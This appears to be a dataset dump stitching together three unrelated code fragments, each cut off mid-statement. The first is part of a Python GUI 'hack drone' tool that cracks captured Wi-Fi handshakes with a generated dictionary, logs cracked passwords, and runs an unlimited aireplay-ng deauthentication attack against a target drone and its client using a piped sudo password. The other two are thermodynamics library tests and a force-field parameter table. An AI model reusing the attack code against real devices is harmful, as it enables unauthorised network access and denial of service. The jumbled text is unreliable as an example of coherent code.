input
stringlengths
2.65k
237k
output
stringclasses
1 value
= "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☐") self.info_label.config(text = "Cracking password locally.") check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_lite_dictionary" + ".txt" changed_password_generator_lite.passwordInsert(cracked_password_output, password_dictionary_path) changed_password_generator_lite.oneChange(cracked_password_output, password_dictionary_path) local_cracking_password_states = "<PASSWORD> " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap -w " + current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_lite_dictionary" + ".txt 2>&1 | grep 'KEY FOUND!' | awk '{print $4}'" #print(local_cracking_password_states) get_local_cracking_password_states = subprocess.Popen(local_cracking_password_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get local password cracking state local_cracking_password_states = get_local_cracking_password_states.read().splitlines() local_cracked_password = local_cracking_password_states[:1] local_cracked_password_convert = str(local_cracked_password) #Convert to string #print(local_cracked_password_convert) try: local_cracked_password_strip = local_cracked_password_convert.strip("[]") #Remove characters "[]" local_cracked_password = eval(local_cracked_password_strip) #Remove characters "''" success_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [selected_bssid] channel_log = [selected_channel] privacy_log = [selected_privacy] password_log = [local_cracked_password] manufacturer_log = [matched_manufacturer] client_BSSID_log = [selected_ap_client] remote_server_timestamp_log = [success_timestamp] states_log = ["BSSID: " + selected_bssid + " password cracked. The password is: " + local_cracked_password] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":password_log, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv" self.check_cracked_password_list_file = Path(current_path + "/data/cracked_password_list.csv") if self.check_cracked_password_list_file.is_file(): #Check "cracked_password_list.csv" is really exist cracked_BSSID_log = [selected_bssid] password_log = [local_cracked_password] remote_server_timestamp_log = [success_timestamp] dataframe = pd.DataFrame({"cracked_BSSID":cracked_BSSID_log, "password":<PASSWORD>, "timestamp":remote_server_timestamp_log}) dataframe.to_csv(current_path + "/data/cracked_password_list.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "cracked_password_list.csv" try: self.step3_label.config(text = "Cracking password locally   ", image = self.label_finish_icon, compound = "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☑") self.info_label.config(text = "Password cracked.") cracked_password_message = "The password is: " + <PASSWORD> + "\n\nWould you like to connect with your previously selected target?" if messagebox.askokcancel("Successfully Cracked", cracked_password_message): self.load_attack() app.after(2000, self.check_askstring) except SyntaxError: #If not password matched failed_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [selected_bssid] channel_log = [selected_channel] privacy_log = [selected_privacy] password_log = [""] manufacturer_log = [matched_manufacturer] client_BSSID_log = [selected_ap_client] remote_server_timestamp_log = [failed_timestamp] states_log = ["BSSID: " + selected_bssid + " password cannot be cracked by lite dictionary."] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv" try: self.step3_label.config(text = "Cracking password locally   ", image = self.label_fail_icon, compound = "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☒") self.info_label.config(text = "Failed to crack the password locally.") get_messagebox_states = messagebox.askyesnocancel("Error", "Failed to crack the password locally.\n\nWould you like to connect to the remote server for cracking the password, or press 'No' for try to enter the password again?") if get_messagebox_states == True: self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") elif get_messagebox_states == False: self.load_attack() app.after(2000, self.check_askstring) elif get_messagebox_states == None: handshake_message = "4 way handshake file save at: " + current_path + "/handshake, the name is:\n" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.\n\nWould you like to keep running deauthentication attack to prevent the client reconnect to the drone?" if messagebox.askyesno("Request Processed", handshake_message): deauth_info = "echo " + sudo_password + " | sudo -S xterm -iconic -T 'deauthinfo' -hold -e 'aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'" subprocess.Popen(deauth_info, stdout = subprocess.PIPE, shell = True) if messagebox.showinfo("Wi-Fi Deauthentication", "Please press 'OK' to stop Wi-Fi Deauthentication attack."): find_xterm_aireplay_pid = "ps ax | grep 'xterm -iconic -T deauthinfo -hold -e aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'" + " | grep -v grep | grep -v sudo | awk '{print $1}'" get_xterm_aireplay_pid = subprocess.Popen(find_xterm_aireplay_pid, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout xterm_aireplay_pid = get_xterm_aireplay_pid.read().splitlines() xterm_aireplay_pid_convert = str(xterm_aireplay_pid) #Convert to string xterm_aireplay_pid_strip = xterm_aireplay_pid_convert.strip("[]") #Remove characters "[]" return_xterm_aireplay_pid = eval(xterm_aireplay_pid_strip) #Remove characters "''" colse_xterm_aireplay = "echo " + sudo_password + " | sudo -S kill " + return_xterm_aireplay_pid close_xterm_aireplay_terminal = subprocess.Popen(colse_xterm_aireplay, stdout = subprocess.PIPE, shell = True) #For close the xterm aireplay terminal close_xterm_aireplay_terminal.wait() time.sleep(0.3) self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: if messagebox.askyesno("Request Processed", "The 4-way handshake file is collected, would you like to connect to the remote server for cracking the password?"): check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") except NameError: if messagebox.askyesno("Request Processed", "The 4-way handshake file is collected, would you like to connect to the remote server for cracking the password?"): check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: self.check_four_way_handshake_cap_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap") if self.check_four_way_handshake_cap_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.cap" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_csv_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.csv") if self.check_four_way_handshake_csv_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.csv" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.csv", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_kismet_csv_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.csv") if self.check_four_way_handshake_kismet_csv_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.kismet.csv" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.csv", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_kismet_netxml_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.netxml") if self.check_four_way_handshake_kismet_netxml_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.kismet.netxml" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.netxml", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_log_csv_file = Path(current_path + "/handshake/"
and the required # input form. taus = [ [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]], [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]] ] alphas = [[[0.0, 0.0], [0.0, 0.0]], [[0.3, 0], [0.0, 0.0]] ] pp = Nrtl(tau_coeffs=taus, alpha_coeffs=alphas, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations) assert_allclose(pp.gammas(T=m.T, xs=m.zs), [1.1114056946393671, 2.5391220022675163], rtol=1e-6) assert_allclose(pp.alphas(m.T), [[0.0, 0.0], [0.3, 0.0]]) assert_allclose(pp.taus(m.T), [[0.0, 1.7500005828354948], [-0.08352950604691833, 0.0]]) pp.flash(T=m.T, VF=0, zs=m.zs) assert_allclose(pp.P, 72190.62175687613, rtol=2e-3) pp.flash(T=m.T, VF=1, zs=m.zs) assert_allclose(pp.P, 40485.10473289466, rtol=2e-3) @pytest.mark.deprecated def test_NRTL_package_constants(): taus = [ [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]], [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]] ] alphas = [[[0.0, 0.0], [0.0, 0.0]], [[0.3, 0], [0.0, 0.0]] ] IDs = ['water', 'ethanol'] # tau_coeffs, alpha_coeffs zs = [1-.252, .252] pkg = PropertyPackageConstants(IDs, name=NRTL_PKG, tau_coeffs=taus, alpha_coeffs=alphas) pkg.pkg.flash(zs=zs, T=300, VF=0.5) pkg.pkg.phase, pkg.pkg.P assert_allclose(pkg.pkg.P, 5763.42373196148, atol=20, rtol=1e-4) @pytest.mark.deprecated def test_Unifac_EOS_POY(): m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15) pkg = Unifac(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX) pkg.use_phis, pkg.use_Poynting = True, True pkg.flash(zs=m.zs, T=400, VF=0.5) xs_expect = [0.04428613261665119, 0.28125472768746834, 0.6744591396958806] ys_expect = [0.15571386738334897, 0.518745272312532, 0.32554086030411905] assert pkg.phase == 'l/g' assert_allclose(pkg.xs, xs_expect, rtol=1e-3) assert_allclose(pkg.ys, ys_expect, rtol=1e-3) assert_allclose(pkg.P, 230201.5387679756, rtol=1e-3) @pytest.mark.fuzz @pytest.mark.slow @pytest.mark.deprecated def test_Unifac_fuzz(): m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15) vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs) for i in range(500): zs = [uniform(0, 1) for i in range(2)] zs = [i/sum(zs) for i in zs] T_known = uniform(274, 513) V_over_F_known = uniform(0, 1) vodka.flash(T=T_known, VF=V_over_F_known, zs=zs) P_known = vodka.P xs_known = vodka.xs ys_known = vodka.ys phase_known = vodka.phase # test TP flash gives the same as TVF vodka.flash(T=T_known, P=P_known, zs=zs) assert_allclose(V_over_F_known, vodka.V_over_F, rtol=1E-5) assert_allclose(xs_known, vodka.xs, rtol=1E-5) assert_allclose(ys_known, vodka.ys, rtol=1E-5) assert vodka.phase == phase_known # Test PVF flash gives same as well vodka.flash(VF=V_over_F_known, P=P_known, zs=zs) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert_allclose(xs_known, vodka.xs) assert_allclose(T_known, vodka.T) assert vodka.phase == phase_known @pytest.mark.slow @pytest.mark.deprecated def test_UnifacDortmund(): m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15) vodka = UnifacDortmund(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs) # Low pressure ethanol-water ideal TP flash phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs) V_over_F_expect = 0.721802969194136 xs_expect = [0.26331608196660095, 0.736683918033399] ys_expect = [0.5912226272910779, 0.408777372708922] assert phase == 'l/g' assert_allclose(xs, xs_expect) assert_allclose(ys, ys_expect) assert_allclose(V_over_F, V_over_F_expect) # Same flash with T-VF spec phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs) assert phase == 'l/g' assert_allclose(xs, xs_expect, rtol=1E-5) assert_allclose(ys, ys_expect, rtol=1E-5) assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5) # Same flash with P-VF spec phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs) assert phase == 'l/g' assert_allclose(xs, xs_expect, rtol=1E-5) assert_allclose(ys, ys_expect, rtol=1E-5) assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5) # Test the flash interface directly T_known = m.T V_over_F_known = V_over_F_expect zs = m.zs vodka.flash(T=T_known, VF=V_over_F_known, zs=zs) P_known = vodka.P xs_known = vodka.xs ys_known = vodka.ys phase_known = vodka.phase # test TP flash gives the same as TVF vodka.flash(T=T_known, P=P_known, zs=zs) assert_allclose(V_over_F_known, vodka.V_over_F) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert vodka.phase == phase_known # Test PVF flash gives same as well vodka.flash(VF=V_over_F_known, P=P_known, zs=zs) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert_allclose(xs_known, vodka.xs) assert_allclose(T_known, vodka.T) assert vodka.phase == phase_known @pytest.mark.deprecated def test_plotting_failures(): m = Mixture(['ethanol', 'methanol', 'water'], zs=[0.3, 0.3, 0.4], P=5000, T=298.15) ternary = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs) with pytest.raises(Exception): ternary.plot_Pxy(300) with pytest.raises(Exception): ternary.plot_Txy(300) with pytest.raises(Exception): ternary.plot_xy(300) @pytest.mark.deprecated def test_IdealCaloric_single_component_H(): w = Chemical('water') EnthalpyVaporization = w.EnthalpyVaporization HeatCapacityGas = w.HeatCapacityGas VaporPressure = w.VaporPressure m = Mixture(['water'], zs=[1], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) pkg.P_DEPENDENT_H_LIQ = False # Check the enthalpy of vaporization matches at the reference temperature pkg.flash(T=298.15, P=1E5, zs=m.zs) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, -EnthalpyVaporization(298.15)) # Check it's pressure independent for the gas (at ref T) kw_options = [{'P': w.Psat}, {'P': 100}, {'P': 1E-10}, {'VF': 1}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, 0) # Check it's pressure is independent (so long as it stays liquid) kw_options = [{'P': w.Psat+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, -EnthalpyVaporization(298.15)) # Gas heat capacity along the vapor curve (and above it) for T in np.linspace(w.Tm, w.Tc-1): for kw in [{'VF': 1}, {'P': VaporPressure(T)*0.5}]: pkg.flash(T=T, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, HeatCapacityGas.T_dependent_property_integral(298.15, T)) # Gas heat capacity plus enthalpy of vaporization along the liquid for T in np.linspace(w.Tm, w.Tc-1): for kw in [{'VF': 0}, {'P': VaporPressure(T)*1.1}]: pkg.flash(T=T, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() H_recalc = (HeatCapacityGas.T_dependent_property_integral(298.15, T) -EnthalpyVaporization(T)) assert_allclose(H_pp, H_recalc) # Just one basic case at VF = 0.5 T = 298.15 pkg.flash(T=T, zs=m.zs, VF=0.5) assert_allclose(pkg.enthalpy_Cpg_Hvap(), -0.5*EnthalpyVaporization(T)) # For a variety of vapor fractions and temperatures, check the enthapy is correctly described for VF in np.linspace(0., 1, 20): for T in np.linspace(w.Tm, w.Tc, 5): pkg.flash(T=T, zs=m.zs, VF=VF) pkg_calc = pkg.enthalpy_Cpg_Hvap() hand_calc = -(1 - VF)*EnthalpyVaporization(T) + HeatCapacityGas.T_dependent_property_integral(298.15, T) assert_allclose(pkg_calc, hand_calc) # Check the liquid and vapor enthalpies are equal at the critical point T = w.Tc pkg.flash(T=w.Tc, zs=m.zs, VF=1) Hvap_Tc_1 = pkg.enthalpy_Cpg_Hvap() pkg.flash(T=w.Tc, zs=m.zs, VF=0) Hvap_Tc_0 = pkg.enthalpy_Cpg_Hvap() assert_allclose(Hvap_Tc_0, Hvap_Tc_1) pkg.flash(T=w.Tc, zs=m.zs, VF=0.5) Hvap_Tc_half = pkg.enthalpy_Cpg_Hvap() assert_allclose(Hvap_Tc_0, Hvap_Tc_half) @pytest.mark.deprecated def test_IdealCaloric_binary_H(): m = Mixture(['water', 'ethanol'], zs=[0.3, 0.7], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) pkg.P_DEPENDENT_H_LIQ = False # Check the enthalpy of vaporization matches at the reference temperature (as a liquid) pkg.flash(T=298.15, P=1E5, zs=m.zs) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, (-0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15))) # Check the enthalpy of 0 matches at the reference temperature (as a gas) pkg.flash(T=298.15, VF=1, zs=m.zs) assert_allclose(0, pkg.enthalpy_Cpg_Hvap(), atol=1E-9) # Check the gas, at various pressure but still Tref, has enthalpy of 0 pkg.flash(T=298.15, zs=m.zs, VF=1) P_dew = pkg.P kw_options = [{'P': P_dew}, {'P': 100}, {'P': 1E-10}, {'VF': 1}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, 0, atol=1E-7) # Check it's pressure is independent (so long as it stays liquid), has enthalpy of 0 pkg.flash(T=298.15, zs=m.zs, VF=0) P_bubble = pkg.P kw_options = [{'P': P_bubble+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() H_handcalc = -0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15) assert_allclose(H_pp, H_handcalc) # For a variety of vapor fractions and temperatures, check the enthapy is correctly described for VF in np.linspace(0., 1, 6): for T in np.linspace(280, 400, 8): z1 = uniform(0, 1) z2 = 1-z1 zs = [z1, z2] pkg.flash(T=T, zs=zs, VF=VF) pkg_calc = pkg.enthalpy_Cpg_Hvap() # bad hack as the behavior changed after if pkg.xs == None: pkg.xs = pkg.zs hand_calc =(-(1 - VF)*(pkg.xs[0]*m.EnthalpyVaporizations[0](T) + pkg.xs[1]*m.EnthalpyVaporizations[1](T)) + (z1*m.HeatCapacityGases[0].T_dependent_property_integral(298.15, T) + z2*m.HeatCapacityGases[1].T_dependent_property_integral(298.15, T))) assert_allclose(pkg_calc, hand_calc) @pytest.mark.deprecated def test_IdealCaloric_nitrogen_S(): m = Mixture(['nitrogen'], zs=[1], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) # Check the enthalpy of vaporization matches at the reference temperature for a gas pkg.flash(T=298.15, P=101325, zs=m.zs) S_pp = pkg.entropy_Cpg_Hvap() assert_allclose(S_pp, 0, atol=1E-9) # Check a entropy difference vs coolprop (N2)- 1.5% error pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=298.15, P=2000325, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2-S1, -25.16418, rtol=0.015) # # Check a entropy difference vs coolprop (N2)- 0.3% error pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=298.15, P=102325, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() # 0.3% error with 1 kPa difference assert_allclose(S2-S1, -0.08184949145277187, rtol=0.003) # PropsSI('SMOLAR', 'T', 298.15, 'P', 102325, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2') # S2-S1 # <2.5% error on a 10 MPa/500K N2 vs 298.15 and 1 atm vs coolprop pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=500, P=1E7, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2-S1, -23.549468174122012, rtol=0.026) # PropsSI('SMOLAR', 'T', 500, 'P', 1E7, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2') # Entropy change of condensation at the saturation point of 1 bar - very low error pkg.flash(VF=1, P=1E5, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(VF=0, P=1E5, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() # T_change = PropsSI('T', 'Q', 0, 'P', 1E5, 'N2') # 77.24349973069587 # dS = PropsSI('SMOLAR', 'Q', 0, 'T', T_change, 'N2') - PropsSI('SMOLAR', 'Q', 1, 'T', T_change, 'N2') assert_allclose(S2 - S1, -72.28618677058911, rtol=5E-4) # Same test as before, 50% condensed pkg.flash(VF=1, P=1E5, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(VF=0.5, P=1E5, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2 - S1, -72.28618677058911/2, rtol=5E-4) # Test compressing a liquid doesn't add
108.60 5/2017 1 cu-cx-cu 100.4 50.91 5/2017 2 0.0020 cu-cx-cx 92.5 58.44 5/2017 28 0.4472 cu-cx-hc 46.9 118.69 5/2017 29 0.5914 cx-cx-cx 90.2 60.00 5/2017 1689 0.8111 cx-cx-cy 62.1 125.01 5/2017 7 2.6658 cx-cx-f 85.1 118.81 5/2017 17 1.2118 cx-cx-h1 45.9 118.69 5/2017 1339 1.3738 cx-cx-hc 46.1 117.69 5/2017 3482 0.9446 cx-cx-hx 45.7 119.61 5/2017 20 0.1625 cx-cx-n3 82.1 118.31 5/2017 44 1.4967 cx-cx-na 79.1 126.07 5/2017 53 1.5534 cx-cx-nh 82.3 118.36 5/2017 30 1.0567 cx-cx-os 83.5 117.05 5/2017 24 1.7797 cy-cx-hc 46.5 112.55 5/2017 1 f -cx-f 119.3 109.55 5/2017 2 f -cx-h1 65.5 111.68 SOURCE3 1 f -cx-hc 65.3 112.30 SOURCE2 1 h1-cx-h1 37.9 115.46 5/2017 355 0.3352 h1-cx-n3 61.0 113.39 5/2017 12 1.7033 h1-cx-n 61.1 114.26 5/2017 9 0.9343 h1-cx-na 61.8 108.27 5/2017 27 1.0053 h1-cx-nh 60.9 115.14 5/2017 13 0.0780 h1-cx-os 62.1 114.46 5/2017 3 0.8753 h2-cx-h2 37.9 115.54 5/2017 1 h2-cx-n2 58.7 117.18 SOURCE3 4 hc-cx-hc 38.1 114.43 5/2017 576 0.4881 hc-cx-os 61.1 114.10 SOURCE2 1 hx-cx-n4 59.7 110.22 5/2017 1 n2-cx-n2 162.4 49.07 5/2017 1 n -cx-oh 108.9 114.81 5/2017 1 n -cx-os 141.3 65.98 SOURCE3 1 oh-cx-oh 116.9 107.85 SOURCE3 1 oh-cx-os 108.5 118.12 SOURCE3 4 1.3581 os-cx-os 106.7 116.05 SOURCE4_SOURCE5 15 2.1532 c2-cy-cy 64.0 115.00 5/2017 33 3.1772 c3-cy-c3 65.1 111.38 5/2017 38 1.0405 c3-cy-cy 62.8 117.77 5/2017 593 2.7140 c3-cy-h1 46.5 111.78 5/2017 190 0.4589 c3-cy-hc 46.9 110.12 5/2017 286 0.5586 c3-cy-n3 83.9 110.25 5/2017 3 0.3967 c3-cy-n 84.2 111.04 5/2017 1 c3-cy-os 84.8 110.09 5/2017 2 0.2833 c -cy-c3 63.2 116.70 5/2017 203 0.5967 cc-cy-cy 62.5 121.63 5/2017 9 0.2884 c -cy-cy 73.4 85.16 5/2017 409 1.0345 cd-cy-cy 62.5 121.06 5/2017 18 0.5909 ce-cy-h2 45.8 117.52 5/2017 21 0.5798 ce-cy-n 94.2 87.94 SOURCE4_SOURCE5 38 0.1933 ce-cy-ss 60.4 120.60 5/2017 19 1.1851 c -cy-h1 45.8 112.97 5/2017 96 0.8493 c -cy-hc 46.1 111.24 5/2017 238 1.1926 cl-cy-cy 69.4 117.25 5/2017 41 1.1740 cl-cy-h1 49.1 107.03 5/2017 2 1.3003 cl-cy-hc 47.6 114.00 SOURCE2 1 c -cy-n 81.3 117.38 5/2017 90 1.1235 c -cy-os 82.4 115.16 